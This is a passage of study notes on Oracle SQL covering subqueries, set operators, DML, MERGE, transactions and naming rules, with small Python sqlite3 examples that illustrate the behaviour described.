STAR_TRANSFORMATION_ENABLED, if set to true, permits the
Oracle query optimizer to rewrite code into star queries.</li>
<li>Subqueries can also be used in the FROM clause, where they are
sometimes referred to as inline views.</li>
<li><code>select (select max(salary) from employees) * (select
max(commission_pct) from employees) / 100 from dual;</code> .. In this usage,
the SELECT list used to project columns is being populated with the
results of the subqueries. A subquery used in this manner must be
scalar, or the parent query will fail with an error.</li>
<li>Subqueries can be used in the WHERE clause, the FROM clause, the
SELECT list, and DML statements.</li>
</ol>
<div class="sourceCode" id="cb9"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> sales_hist <span class="kw">select</span> <span class="op">*</span> <span class="kw">from</span> sales <span class="kw">where</span> <span class="dt">date</span> <span class="op">></span> <span class="fu">sysdate</span><span class="op">-</span><span class="dv">1</span>;</span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="kw">update</span> employees <span class="kw">set</span> salary <span class="op">=</span> (<span class="kw">select</span> <span class="fu">avg</span>(salary) <span class="kw">from</span> employees);</span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a><span class="kw">delete</span> <span class="kw">from</span> departments <span class="kw">where</span> department_id <span class="kw">not</span> <span class="kw">in</span> (<span class="kw">select</span> department_id <span class="kw">from</span> employees <span class="kw">where</span> department_id <span class="kw">is</span> <span class="kw">not</span> <span class="kw">null</span>);</span></code></pre></div>
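<p>The NOT IN warning from earlier in this chapter is easy to reproduce.
The sketch below uses Python's built-in <code>sqlite3</code> module as a
stand-in for Oracle (both follow the same three-valued logic for NOT IN);
the tables and rows are hypothetical.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE departments (department_id INTEGER);
    CREATE TABLE employees (employee_id INTEGER, department_id INTEGER);
    INSERT INTO departments VALUES (10), (20), (30);
    -- Employee 3 has no department, so the subquery result contains a NULL.
    INSERT INTO employees VALUES (1, 10), (2, 20), (3, NULL);
""")

def ids(sql):
    """Run a query and return its first column as a list."""
    return [row[0] for row in conn.execute(sql)]

# "30 NOT IN (10, 20, NULL)" evaluates to NULL rather than TRUE,
# so department 30 is silently dropped.
naive = ids("""
    SELECT department_id FROM departments
     WHERE department_id NOT IN (SELECT department_id FROM employees)
""")

# Filtering the NULLs out of the subquery restores the expected answer.
guarded = ids("""
    SELECT department_id FROM departments
     WHERE department_id NOT IN (SELECT department_id FROM employees
                                  WHERE department_id IS NOT NULL)
""")

print(naive)    # []
print(guarded)  # [30]
```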
<ol start="11" type="1">
<li>A subquery can be used to select rows for insertion but not in a
VALUES clause of an INSERT statement.</li>
<li>Usage examples</li>
</ol>
<div class="sourceCode" id="cb10"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> dates <span class="kw">select</span> <span class="fu">sysdate</span> <span class="kw">from</span> dual; <span class="co">-- CORRECT</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> dates (date_col) <span class="kw">values</span> (<span class="kw">select</span> <span class="fu">sysdate</span> <span class="kw">from</span> dual); <span class="co">-- NOT CORRECT</span></span></code></pre></div>
<ol start="13" type="1">
<li>The single-row subquery returns one row. A special case is the
scalar subquery, which returns a single row with one column. .. The
comparison operators valid for single-row subqueries are =, &gt;, &gt;=,
&lt;, &lt;=, and &lt;&gt;. .. The comparison operators valid for
multiple-row subqueries are IN, NOT IN, ANY, and ALL.</li>
<li>Correlated subqueries can be a very inefficient construct, due to
the need for repeated execution of the subquery. Always try to find an
alternative approach.</li>
<li>Usage of ALL</li>
</ol>
<div class="sourceCode" id="cb11"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="kw">select</span> last_name <span class="kw">from</span> employees <span class="kw">where</span> salary <span class="op">></span> <span class="kw">all</span> (<span class="kw">select</span> salary <span class="kw">from</span> employees <span class="kw">where</span> department_id<span class="op">=</span><span class="dv">80</span>);</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a><span class="co">-- &lt; ANY : less than the highest</span></span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a><span class="co">-- &gt; ANY : more than the lowest</span></span>
<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a><span class="co">-- = ANY : equivalent to IN</span></span>
<span id="cb11-6"><a aria-hidden="true" href="#cb11-6" tabindex="-1"></a><span class="co">-- &gt; ALL : more than the highest</span></span>
<span id="cb11-7"><a aria-hidden="true" href="#cb11-7" tabindex="-1"></a><span class="co">-- &lt; ALL : less than the lowest</span></span></code></pre></div>
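<p>The ANY and ALL shorthand above can be checked with a few lines of
plain Python. This is only a model of the comparison rules: the helper
names and the salary list are hypothetical, and NULL handling is
deliberately left out.</p>

```python
import operator

def compare_any(value, op, subquery_rows):
    """value op ANY (subquery): the comparison holds for at least one row."""
    return any(op(value, row) for row in subquery_rows)

def compare_all(value, op, subquery_rows):
    """value op ALL (subquery): the comparison holds for every row."""
    return all(op(value, row) for row in subquery_rows)

# Hypothetical result of "select salary from employees where department_id=80".
dept_80_salaries = [6100, 7500, 14000]
salary = 7000

results = {
    "lt_any": compare_any(salary, operator.lt, dept_80_salaries),  # below the highest (14000)
    "gt_any": compare_any(salary, operator.gt, dept_80_salaries),  # above the lowest (6100)
    "eq_any": compare_any(salary, operator.eq, dept_80_salaries),  # same as IN
    "gt_all": compare_all(salary, operator.gt, dept_80_salaries),  # above the highest
    "lt_all": compare_all(salary, operator.lt, dept_80_salaries),  # below the lowest
}
print(results)
```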
<ol start="16" type="1">
<li><code>NOT &gt;=</code> is invalid: NOT or ! cannot be used in
conjunction with other comparison operators.</li>
<li>SUB QUERIES can be used in SELECT, FROM, WHERE, GROUP BY, HAVING
CANNOT be used in ORDER BY</li>
<li>If a subquery returns NULL, then the comparison will also return
NULL, meaning that no rows will be retrieved.</li>
</ol>
<h3 id="chapter-9">Chapter 9</h3>
<ol type="1">
<li>There is a significant deviation from the ISO standard for SQL here,
in that ISO SQL uses EXCEPT where Oracle uses MINUS, but the
functionality is identical.</li>
<li>Oracle provides three set operators: UNION, INTERSECT, and MINUS.
UNION can be qualified with ALL</li>
<li>Union options .. UNION - Returns the combined rows from two queries,
sorting them and removing duplicates. .. UNION ALL - Returns the
combined rows from two queries without sorting or removing duplicates.
.. INTERSECT - Returns only the rows that occur in both queries’ result
sets, sorting them and removing duplicates. .. MINUS - Returns only the
rows in the first result set that do not appear in the second result
set, sorting them and removing duplicates.</li>
<li>Although pending enhancements to ISO SQL will give INTERSECT a
higher priority than the others, there is currently no priority of one
operator over another. .. To override the default precedence, which is
based on the order in which the operators appear, use parentheses.</li>
<li>The columns in the queries that make up a compound query can have
different names, but the output result set will use the names of the
columns in the first query</li>
<li>Each query in a compound query will project its own list of selected
columns. .. These lists must have the same number of elements, be
nominated in the same sequence, and be of broadly similar data type. ..
They do not have to have the same names (or column aliases), nor do they
need to come from the same tables (or subqueries). .. If the column
names (or aliases) are different, the result set of the compound query
will have columns named as they were in the first query. .. While the
selected column lists do not have to be exactly the same data type, they
must be from the same data type group. .. For example, DATE and NUMBER
columns in the first query match TIMESTAMP and INTEGER columns in the
second query. .. The result set of the compound query will have columns
with the higher level of precision: in this case, they would be
TIMESTAMP and NUMBER. .. There is no implicit casting: if the second
query retrieved columns of type VARCHAR2, the compound query would throw
an error even if the string variables could be resolved to legitimate
date and numeric values.</li>
<li>UNION, MINUS, and INTERSECT will always combine the results sets of
the input queries, then sort the results to remove duplicate rows. The
sorting is based on all the columns, from left to right. .. If all the
columns in two rows have the same value, then only the first row is
returned in the compound result set</li>
<li>It is possible to put a single ORDER BY clause at the end of the
compound query. It is not possible to use ORDER BY in any of the queries
that make up the whole compound query, as this would disrupt the sorting
that is necessary to remove duplicates</li>
<li>UNION ALL -> the result sets of the two input queries will be
concatenated to form the result of the compound query .. Can’t use ORDER
BY in the individual queries; it can only appear at the end of the
compound query</li>
<li>If you know that there can be no duplicates between two tables, then
always use UNION ALL. It saves the database from doing a lot of
sorting.</li>
<li>Remember: a value padded with spaces sorts ahead of letters
[relevant when CHAR is converted to VARCHAR2].</li>
<li>An INTERSECT between CHAR and VARCHAR2 columns will not treat values
as equal unless the VARCHAR2 field holds exactly the same number of
spaces.</li>
<li>A MINUS runs both queries, sorts the results, and returns only the
rows from the first result set that do not appear in the second result
set.</li>
<li>For Mismatching number of columns, we can use TO_CHAR(NULL)</li>
</ol>
<div class="sourceCode" id="cb12"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a><span class="kw">select</span> name,tail_length,<span class="fu">to_char</span>(<span class="kw">null</span>) <span class="kw">from</span> cats</span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a><span class="kw">union</span> <span class="kw">all</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a><span class="kw">select</span> name,<span class="fu">to_char</span>(<span class="kw">null</span>),wing_span <span class="kw">from</span> birds;</span></code></pre></div>
<ol start="15" type="1">
<li>Without parentheses, the set operators will be applied in the
sequence in which they are specified</li>
<li>Using an ORDER BY clause inside the individual queries of a compound
query throws an error.</li>
<li>There is no problem with placing an ORDER BY clause at the end of
the compound query. .. However, there might be a problem with using an
aliased column in the ORDER BY clause of three or more queries. .. The
alias declaration and its usage have to be in successive queries, or
else it does not work.</li>
</ol>
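<p>A quick way to see the set operators side by side is the sketch
below. It runs on SQLite through Python's <code>sqlite3</code> module,
so MINUS is spelled EXCEPT (the ISO form mentioned at the top of this
chapter); the two tables and their rows are hypothetical. The single
ORDER BY sits at the end of each compound query, as the notes
require.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE old_regions (region_name TEXT);
    CREATE TABLE new_regions (region_name TEXT);
    INSERT INTO old_regions VALUES ('Europe'), ('Asia'), ('Asia');
    INSERT INTO new_regions VALUES ('Asia'), ('Americas');
""")

def run(set_operator):
    """Combine the two tables with the given set operator, ordering at the very end."""
    sql = f"""
        SELECT region_name FROM old_regions
        {set_operator}
        SELECT region_name FROM new_regions
        ORDER BY region_name
    """
    return [row[0] for row in conn.execute(sql)]

union_rows = run("UNION")          # duplicates removed
union_all_rows = run("UNION ALL")  # plain concatenation, duplicates kept
intersect_rows = run("INTERSECT")  # rows present in both inputs
minus_rows = run("EXCEPT")         # rows only in the first input (Oracle: MINUS)

print(union_rows)      # ['Americas', 'Asia', 'Europe']
print(union_all_rows)  # ['Americas', 'Asia', 'Asia', 'Asia', 'Europe']
print(intersect_rows)  # ['Asia']
print(minus_rows)      # ['Europe']
```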
<h3 id="chapter-10">Chapter 10</h3>
<ol type="1">
<li>MERGE can be thought of as a shortcut for executing either an INSERT
or an UPDATE or a DELETE, depending on some condition.</li>
<li>The final list of DML statements is: SELECT, INSERT, UPDATE, DELETE,
MERGE.</li>
<li>TRUNCATE is often thought of as DML, but it is actually DDL.</li>
<li>There are much faster techniques than INSERT for populating a table
with large numbers of rows. These are the SQL*Loader utility, which can
upload data from files produced by an external feeder system, and
Data Pump, which can transfer data in bulk from one Oracle database to
another, either via disk files or through a network link.</li>
<li>One UPDATE statement can change rows in only one table, but it can
change any number of rows in that table.</li>
<li>MERGE was introduced with the SQL:2003 standard; Oracle implemented
it in database release 9i.</li>
<li>UPSERT: a proprietary SQL implementation of MERGE.</li>
<li>A MERGE passes through the source data, for each row attempting to
locate a matching row in the target. .. If no match is found, a row can
be inserted; .. If a match is found, the matching row can be updated.
The release 10g enhancement means that the target row can even be
deleted, after being matched and updated.</li>
<li>Transactions, consisting of INSERT, UPDATE, and DELETE (or even
MERGE) commands can be made permanent (with a COMMIT) or reversed (with
a ROLLBACK). .. A TRUNCATE command, like any other DDL command, is
immediately permanent: it can never be reversed.</li>
<li>TRUNCATE is DDL and not DML because it cannot be controlled by
transactions (within the database, DDL commands are in fact implemented
as transactions, but developers cannot control them).</li>
<li>Whereas a deletion may take some time (possibly hours, if there are
many rows in the table) a truncation will go through instantly. It makes
no difference whether the table contains one row or billions</li>
<li>DDL commands, such as TRUNCATE, will fail if there is any DML
command active on the table. A transaction will block the DDL command
until the DML command is terminated with a COMMIT or a ROLLBACK.</li>
<li>If the user attempting to execute the statement does not have the
relevant permissions on the tables to which it refers, the database will
return an error identical to that which would be returned if the object
did not exist. As far as the user is concerned, it does not exist</li>
<li>INSERT: <code>insert into hr.regions values (10,'Great Britain');</code> .. When
the database receives a statement using positional notation, it will
match the order of the values to the order in which the columns of the
table are defined.</li>
</ol>
<ol start="15" type="1">
<li>INSERT Performance</li>
</ol>
<div class="sourceCode" id="cb13"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> employees (employee_id, last_name, hire_date) <span class="kw">values</span> (<span class="dv">1000</span>,<span class="st">'WATSON'</span>,<span class="st">'03-Nov-07'</span>);</span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> employees (employee_id, last_name, hire_date) <span class="kw">values</span> (<span class="dv">1000</span>,<span class="fu">upper</span>(<span class="st">'Watson'</span>),<span class="fu">to_date</span>(<span class="st">'03-Nov-07'</span>,<span class="st">'dd-mon-yy'</span>));</span></code></pre></div>
<pre><code>.. The second is better than the first because of the UPPER casing, which is useful in sorting
.. to_date prevents the performance hit of implicit conversion</code></pre>
<ol start="16" type="1">
<li>Any SELECT statement, specified as a subquery, can be used as the
source of rows passed to an INSERT. This enables insertion of many rows.
.. Alternatively, using the VALUES clause will insert one row. The
values can be literals or prompted for as substitution variables.</li>
</ol>
<ol start="17" type="1">
<li>insert all</li>
</ol>
<div class="sourceCode" id="cb15"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">all</span></span>
<span id="cb15-2"><a aria-hidden="true" href="#cb15-2" tabindex="-1"></a><span class="cf">when</span> <span class="dv">1</span><span class="op">=</span><span class="dv">1</span> <span class="cf">then</span></span>
<span id="cb15-3"><a aria-hidden="true" href="#cb15-3" tabindex="-1"></a> <span class="kw">into</span> emp_no_name (department_id,job_id,salary,commission_pct,hire_date)</span>
<span id="cb15-4"><a aria-hidden="true" href="#cb15-4" tabindex="-1"></a> <span class="kw">values</span> (department_id,job_id,salary,commission_pct,hire_date)</span>
<span id="cb15-5"><a aria-hidden="true" href="#cb15-5" tabindex="-1"></a></span>
<span id="cb15-6"><a aria-hidden="true" href="#cb15-6" tabindex="-1"></a><span class="cf">when</span> department_id <span class="op"><></span> <span class="dv">80</span> <span class="cf">then</span></span>
<span id="cb15-7"><a aria-hidden="true" href="#cb15-7" tabindex="-1"></a> <span class="kw">into</span> emp_non_sales (employee_id,department_id,salary,hire_date)</span>
<span id="cb15-8"><a aria-hidden="true" href="#cb15-8" tabindex="-1"></a> <span class="kw">values</span> (employee_id,department_id,salary,hire_date)</span>
<span id="cb15-9"><a aria-hidden="true" href="#cb15-9" tabindex="-1"></a></span>
<span id="cb15-10"><a aria-hidden="true" href="#cb15-10" tabindex="-1"></a><span class="cf">when</span> department_id <span class="op">=</span> <span class="dv">80</span> <span class="cf">then</span></span>
<span id="cb15-11"><a aria-hidden="true" href="#cb15-11" tabindex="-1"></a> <span class="kw">into</span> emp_sales (employee_id,salary,commission_pct,hire_date)</span>
<span id="cb15-12"><a aria-hidden="true" href="#cb15-12" tabindex="-1"></a> <span class="kw">values</span> (employee_id,salary,commission_pct,hire_date)</span>
<span id="cb15-13"><a aria-hidden="true" href="#cb15-13" tabindex="-1"></a></span>
<span id="cb15-14"><a aria-hidden="true" href="#cb15-14" tabindex="-1"></a><span class="kw">select</span> employee_id,department_id,job_id,salary,commission_pct,hire_date</span>
<span id="cb15-15"><a aria-hidden="true" href="#cb15-15" tabindex="-1"></a><span class="kw">from</span> employees <span class="kw">where</span> hire_date <span class="op">></span> <span class="fu">sysdate</span> <span class="op">-</span> <span class="dv">30</span>;</span></code></pre></div>
<p>NOTE: ALL means that every WHEN clause whose condition matches
receives the row. With INSERT FIRST instead of INSERT ALL, only the
first matching WHEN clause is filled.</p>
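<p>The routing rule in the note can be modelled in a few lines of
Python. This is a simulation rather than real SQL: the function name,
the sample rows, and the idea of collecting employee IDs per target are
all assumptions made for illustration. It contrasts INSERT ALL with
Oracle's INSERT FIRST variant using the same three WHEN branches as the
statement above.</p>

```python
def multitable_insert(rows, branches, first=False):
    """Route each source row into target lists, like a conditional multitable insert.

    branches is a list of (target_name, condition) pairs, checked in order.
    With first=False every matching branch receives the row (INSERT ALL);
    with first=True only the first matching branch does (INSERT FIRST).
    """
    targets = {name: [] for name, _ in branches}
    for row in rows:
        for name, condition in branches:
            if condition(row):
                targets[name].append(row["employee_id"])
                if first:
                    break
    return targets

# Hypothetical source rows standing in for the SELECT at the end of the statement.
rows = [
    {"employee_id": 1, "department_id": 80},
    {"employee_id": 2, "department_id": 50},
]
branches = [
    ("emp_no_name", lambda r: True),                         # when 1=1
    ("emp_non_sales", lambda r: r["department_id"] != 80),   # department is not 80
    ("emp_sales", lambda r: r["department_id"] == 80),       # department is 80
]

insert_all = multitable_insert(rows, branches)
insert_first = multitable_insert(rows, branches, first=True)

print(insert_all)    # {'emp_no_name': [1, 2], 'emp_non_sales': [2], 'emp_sales': [1]}
print(insert_first)  # {'emp_no_name': [1, 2], 'emp_non_sales': [], 'emp_sales': []}
```

<p>Because the first branch is always true, the FIRST variant never
reaches the other two targets, which is why branch order matters
there.</p>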
<ol start="18" type="1">
<li><code>UPDATE table SET column=value [,column=value...] [WHERE condition];</code></li>
<li><em>UPDATE table</em></li>
</ol>
<div class="sourceCode" id="cb16"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a><span class="kw">UPDATE</span> <span class="kw">table</span></span>
<span id="cb16-2"><a aria-hidden="true" href="#cb16-2" tabindex="-1"></a> <span class="kw">SET</span> <span class="kw">column</span><span class="op">=</span>[subquery] [,<span class="kw">column</span><span class="op">=</span>subquery<span class="op">..</span>.]</span>
<span id="cb16-3"><a aria-hidden="true" href="#cb16-3" tabindex="-1"></a> <span class="kw">WHERE</span> <span class="kw">column</span> <span class="op">=</span> (subquery) [<span class="kw">AND</span> <span class="kw">column</span><span class="op">=</span>subquery<span class="op">..</span>.] ;</span></code></pre></div>
<ol start="20" type="1">
<li><p>There is a rigid restriction on the subqueries used to update
columns in the SET clause: each subquery must return a scalar value. ..
If it returned more than one row, the statement would fail with the
error ORA-01427: single-row subquery returns more than one row. .. The
subqueries used to select the rows must also be scalar, unless they use
the IN predicate.</p></li>
<li><p>DELETE FROM table [WHERE condition];</p></li>
<li><p>TRUNCATE is a DDL (Data Definition Language) command. TRUNCATE
completely empties the table. .. There is no concept of row selection,
as there is with a DELETE. .. It operates within the data dictionary and
affects the structure of the table, not the contents of the table. ..
However, the change it makes to the structure has the side effect of
destroying all the rows in the table.</p></li>
<li><p>The data dictionary tracks how much of the space allocated to the
table has been used. This is done with the high water mark. .. The high
water mark is the last position in the last extent that has been used ..
Inserting rows into a table pushes the high water mark up. .. Deleting
them leaves the high water mark where it is; .. The space they occupied
remains assigned to the table but is freed up for inserting more
rows.</p></li>
<li><p>Truncating a table resets the high water mark. .. A truncation is
fast: virtually instantaneous, irrespective of whether the table has
many millions of rows or none.</p></li>
<li><p><code>TRUNCATE TABLE table;</code></p></li>
<li><p><em>Merge Into Query</em></p></li>
</ol>
<div class="sourceCode" id="cb17"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a><span class="kw">merge</span> <span class="kw">into</span> employees e <span class="kw">using</span> new_employees n</span>
<span id="cb17-2"><a aria-hidden="true" href="#cb17-2" tabindex="-1"></a> <span class="kw">on</span> (e.employee_id <span class="op">=</span> n.employee_id)</span>
<span id="cb17-3"><a aria-hidden="true" href="#cb17-3" tabindex="-1"></a> <span class="cf">when</span> matched <span class="cf">then</span></span>
<span id="cb17-4"><a aria-hidden="true" href="#cb17-4" tabindex="-1"></a> <span class="kw">update</span> <span class="kw">set</span> e.salary<span class="op">=</span>n.salary</span>
<span id="cb17-5"><a aria-hidden="true" href="#cb17-5" tabindex="-1"></a> <span class="cf">when</span> <span class="kw">not</span> matched <span class="cf">then</span></span>
<span id="cb17-6"><a aria-hidden="true" href="#cb17-6" tabindex="-1"></a> <span class="kw">insert</span> (employee_id,last_name,salary) <span class="kw">values</span> (n.employee_id,n.last_name,n.salary);</span></code></pre></div>
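<p>To see what the MERGE above saves you from writing, the sketch below
spells out the same effect as a separate UPDATE and INSERT. It runs on
SQLite through Python's <code>sqlite3</code> module, used here only as a
convenient stand-in; the sample rows are hypothetical.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE employees (employee_id INTEGER PRIMARY KEY, last_name TEXT, salary INTEGER);
    CREATE TABLE new_employees (employee_id INTEGER PRIMARY KEY, last_name TEXT, salary INTEGER);
    INSERT INTO employees VALUES (1, 'King', 24000), (2, 'Kochhar', 17000);
    INSERT INTO new_employees VALUES (2, 'Kochhar', 18000), (3, 'De Haan', 17000);
""")

# "when matched then update": copy the salary for rows present in both tables.
conn.execute("""
    UPDATE employees
       SET salary = (SELECT n.salary FROM new_employees n
                      WHERE n.employee_id = employees.employee_id)
     WHERE employee_id IN (SELECT employee_id FROM new_employees)
""")

# "when not matched then insert": add the source rows that have no target row.
conn.execute("""
    INSERT INTO employees (employee_id, last_name, salary)
    SELECT n.employee_id, n.last_name, n.salary
      FROM new_employees n
     WHERE n.employee_id NOT IN (SELECT employee_id FROM employees)
""")

merged = conn.execute(
    "SELECT employee_id, last_name, salary FROM employees ORDER BY employee_id"
).fetchall()
print(merged)  # [(1, 'King', 24000), (2, 'Kochhar', 18000), (3, 'De Haan', 17000)]
```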
<ol start="26" type="1">
<li><p>ACID test: a database must guarantee atomicity, consistency,
isolation, and durability. .. Atomicity states that all parts of a
transaction must complete or none of them [for example, two related
updates must happen as a single transaction]. .. Consistency states
that the results of a query must be consistent with the state of the
database at the time the query started [updates made while the query
runs must not show up in its results]. .. The principle of consistency
requires that the database ensure that changed values are not seen by
the query; if it cannot, the query fails with ORA-1555 snapshot too old,
which usually means the DBA has not configured the database properly. ..
Isolation states that an incomplete (that is, uncommitted) transaction
must be invisible to the rest of the world. .. Durability states that
once a transaction completes, it must be impossible for the database to
lose it.</p></li>
<li><p>A session begins a transaction the moment it issues any INSERT,
UPDATE, or DELETE statement (but not a TRUNCATE, that is a DDL command,
not DML). .. The transaction continues through any number of further DML
commands until the session issues either a COMMIT or a ROLLBACK
statement</p></li>
<li><p>It is impossible to nest transactions in industry-standard SQL.
This can be done with PL/SQL (Oracle’s proprietary third-generation
language).</p></li>
<li><p>The explicit transaction control statements are COMMIT, ROLLBACK,
and SAVEPOINT. .. The implicit ones are: … Issuing a DDL (CREATE, ALTER,
or DROP) or DCL (GRANT or REVOKE) statement … Exiting from the user tool
(SQL*Plus or SQL Developer or anything else) … If the client session
dies … If the system crashes</p></li>
<li><p>If a user starts a transaction by issuing a DML command and then
exits from the tool he is using without explicitly issuing either a
COMMIT or a ROLLBACK, the transaction will terminate, but whether it
terminates with a COMMIT or a ROLLBACK is entirely dependent on how the
tool is written</p></li>
<li><p>If a client’s session fails for some reason, the database will
always roll back the transaction. .. the user process can die or be
killed at the operating system level, .. the network connection to the
database server may go down, .. the machine where the client tool is
running can crash.</p></li>
<li><p>The behavior is that the session is killed, and an active
transaction is rolled back.</p></li>
<li><p>The SAVEPOINT command can be used to set markers that will stage
the action of a ROLLBACK, but the same transaction remains in progress
irrespective of the use of SAVEPOINT.</p></li>
<li><p>COMMIT;</p></li>
<li><p>ROLLBACK [TO SAVEPOINT savepoint] ;</p></li>
<li><p>A COMMIT is instantaneous, because it doesn’t really have to do
anything. The work has already been done. .. A ROLLBACK can be very
slow: it will usually take as long (if not longer) to reverse a
transaction than it took to make the changes in the first place. ..
Rollbacks are not good for database performance.</p></li>
<li><p>SAVEPOINT is used only for ROLLBACK and does not commit the
data</p></li>
<li><p>The SAVEPOINT command is not (yet) part of the official SQL
standard, so it may be considered good practice to avoid it in
production systems. .. It can be very useful in development, though,
when you are testing the effect of DML statements and walking through a
complex transaction step by step.</p></li>
<li><p>SET AUTOCOMMIT ON: changes the behavior in both tools so that
every DML statement commits immediately, in its own
transaction.</p></li>
<li><p>SELECT FOR UPDATE: <code>select * from regions for
update;</code></p></li>
<li><p>The transaction is started implicitly with the first DML
statement executed. .. Until it is committed, it can be reversed with a
ROLLBACK</p></li>
<li><p>The FOR UPDATE clause will place a lock on all the rows
retrieved. .. No changes can be made to them by any session other than
that which issued the command, and therefore the subsequent updates will
succeed .. The locks placed by a FOR UPDATE clause will be held until
the session issuing the command issues a COMMIT or ROLLBACK.</p></li>
<li><p>If an UPDATE or DELETE command has a WHERE clause that gives it a
scope of several rows, what will happen if there is an error part way
through execution? The command is one of several in a multistatement
transaction. Whatever work the command had done before hitting the error
will be rolled back, but work done already by the transaction will
remain.</p></li>
<li><p>You want to insert a row and then update it. What sequence of
steps should you follow? SIMPLEST and BEST WAY: INSERT, UPDATE,
COMMIT</p></li>
<li><p>Creating savepoints and rolling back to them leave the
transaction in progress .. COMMIT and ROLLBACK are the commands to
terminate a transaction explicitly; TRUNCATE will do it
implicitly.</p></li>
</ol>
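<p>The savepoint and statement-level rollback behavior described in this
chapter can be explored with the sketch below. It uses SQLite through
Python's <code>sqlite3</code> module as a stand-in, so details such as
locking and implicit commits differ from Oracle; the table contents and
the savepoint name are hypothetical.</p>

```python
import sqlite3

# isolation_level=None stops the sqlite3 module from issuing its own BEGIN/COMMIT,
# so the transaction control statements below are exactly what gets run.
conn = sqlite3.connect(":memory:", isolation_level=None)
conn.execute("CREATE TABLE regions (region_id INTEGER PRIMARY KEY, region_name TEXT)")

def names():
    """Return the region names currently visible to this session."""
    return [row[0] for row in conn.execute(
        "SELECT region_name FROM regions ORDER BY region_id")]

conn.execute("BEGIN")
conn.execute("INSERT INTO regions VALUES (1, 'Europe')")
conn.execute("SAVEPOINT after_europe")
conn.execute("INSERT INTO regions VALUES (2, 'Asia')")

# Rolling back to the savepoint undoes 'Asia' but leaves the transaction open.
conn.execute("ROLLBACK TO SAVEPOINT after_europe")
after_savepoint_rollback = names()
still_in_transaction = conn.in_transaction

# A statement that fails part way through is undone as a whole,
# while earlier work in the same transaction survives.
try:
    conn.execute("INSERT INTO regions VALUES (3, 'Africa'), (1, 'Duplicate key')")
except sqlite3.IntegrityError:
    pass
after_failed_statement = names()

conn.execute("COMMIT")
after_commit = names()

print(after_savepoint_rollback, still_in_transaction)  # ['Europe'] True
print(after_failed_statement)                          # ['Europe']
print(after_commit)                                    # ['Europe']
```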
<h3 id="chapter-11">Chapter 11</h3>
<ol type="1">
<li><p><code>select object_type,count(object_type) from dba_objects group by
object_type order by object_type</code> .. DBA_OBJECTS is a view.</p></li>
<li><p>USER_OBJECTS lists the objects owned by you; ALL_OBJECTS lists
the objects to which you have been granted access.</p></li>
<li><p>User SYS owns the data dictionary: a set of tables (in the SYS
schema) that define the database and its contents. .. SYS also owns
several hundred PL/SQL packages: code that is provided for the use of
database administrators and developers.</p></li>
<li><p>You update the data dictionary by running DDL commands (such as
CREATE TABLE), which provide a layer of abstraction between you and the
data dictionary itself. .. The SYSTEM schema stores various additional
objects used for administration and monitoring.</p></li>
<li><p>The user MDSYS stores the objects used by Oracle Spatial, an
option that extends the capabilities of the Oracle database to manage
geographical information.</p></li>
<li><p>The name may be from 1 to 30 characters long (with the exception
of database link names that may be up to 128 characters long). ..
Reserved words (such as SELECT) cannot be used as object names. .. All
names must begin with a letter from A to Z. .. The characters in a name
can only be letters, numbers, an underscore (_), the dollar sign ($), or
the hash symbol (#). .. Lowercase letters will be converted to
uppercase.</p></li>
<li><p>By enclosing the name within double quotes, all these rules (with
the exception of the length) can be broken, but to get to the object,
subsequently, it must always be specified with double quotes. .. Note
that the same restrictions also apply to column names</p></li>
<li><p>Tools such as SQL*Plus and SQL Developer will automatically
convert lowercase letters to uppercase unless the name is enclosed
within double quotes</p></li>
<li><p>While it is possible to use lowercase names and nonstandard
characters (even spaces), it is considered bad practice because of the
confusion it can cause.</p></li>
<li><p>Tables, views, and private synonyms share one namespace. ..
Indexes and constraints each have their own namespace. .. Object names
must be unique within a single namespace.</p></li>
<li><p>On creation, the table will have been assigned a limited amount
of space (known as an extent) within the database.</p></li>
<li><p>Character data types .. VARCHAR2 - variable length, from 1 byte
to 4KB .. NVARCHAR2 - stored in the alternative national language
character set .. CHAR - fixed length, from 1 byte to 2KB</p></li>
<li><p>For ISO/ANSI compliance, you can specify a VARCHAR data type, but
any columns of this type will be automatically converted to
VARCHAR2.</p></li>
</ol>
<h4 id="for-binary-data">For binary data</h4>
<ol type="1">
<li><p>RAW: 1 byte to 4KB</p></li>
<li><p>RAW data is not converted by Oracle Net from the database’s
character set to the user process’s character set on SELECT or the other
way on INSERT.</p></li>
</ol>
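<p>The object naming rules listed earlier in this chapter (length,
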